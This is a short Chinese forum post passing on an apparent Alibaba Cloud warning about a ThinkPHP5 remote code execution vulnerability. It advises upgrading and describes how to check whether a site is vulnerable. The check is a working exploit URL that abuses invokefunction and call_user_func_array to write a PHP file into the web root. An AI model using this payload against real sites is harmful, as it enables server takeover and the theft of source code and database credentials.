获得徽章 0
- 阿里云检测:ThinkPHP5远程代码执行高危漏
测试访问:http://项目地址/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][] =info.php&vars[1][]=%3C?php%20phpinfo();?%3E
如果根目录多了info.php。里面有注入的内容代码。恭喜你中招了!!!可能泄露项目源码,数据库连接信息,服务器中的各种各种。。。
建议升级到官方最新版展开24